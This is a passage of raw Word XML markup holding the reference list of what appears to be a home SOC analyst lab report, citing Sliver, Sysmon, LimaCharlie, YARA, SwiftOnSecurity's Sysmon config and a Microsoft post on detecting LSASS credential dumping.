        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
      </w: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"https://github.com/BishopFox/sliver"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https://github.com/BishopFox/sliver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="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 xml:space="preserve">Sysinternals Sysmon. Available at: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pP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"https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon"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https://learn.microsoft.com/en-us/sysinternals/downloa</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ds/sysmon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="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LimaCharlie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Available at:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pP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"https://limacharlie.io/"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https://limacharlie.io/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="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YARA - The Pattern Matching Swiss Knife for Malware Researchers. Available at:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
      </w: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"https://virustotal.github.io/yara/"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https://virustotal.github.io/yara/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="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auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">So You Want to Be a SOC Analyst? (Introduction). Available at: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
      </w: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"https://blog.ecapuano.com/p/so-you-want-to-be-a-soc-analyst-intro?sd=pf"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https://blog.ecapuano.com/p/so-you-want-to-be-a-soc-analyst-intro?sd=pf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="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0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">YouTube: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Uncover the Secrets of a Home SOC Analyst Lab!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Available at: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://youtu.be/oOzihldLz7U" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://youtu.be/oOzihldLz7U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">YouTube: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>So You Want To Be a SOC Analyst? With Eric Capuano</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">. Available at: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://youtu.be/P_Kl2EnF8_A" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://youtu.be/P_Kl2EnF8_A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">SwiftOnSecurity/sysmon-config: SwiftOnSecurity's configuration for Sysmon. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://raw.githubusercontent.com/SwiftOnSecurity/sysmon-config/master/sysmonconfig-export.xml" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Courier New"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://raw.githubusercontent.com/SwiftOnSecurity/sysmon-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Courier New"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Courier New"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Courier New"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Courier New"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Courier New"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Courier New"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Courier New"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>onfig/master/sysmonconfig-export.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Detecting and preventing LSASS credential dumping attacks. Available at: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.microsoft.com/en-us/security/blog/2022/10/05/detecting-and-preventing-lsass-credential-dumping-attacks/" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://www.microsoft.com/en-us/security/blog/2022/10/05/detecting-and-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
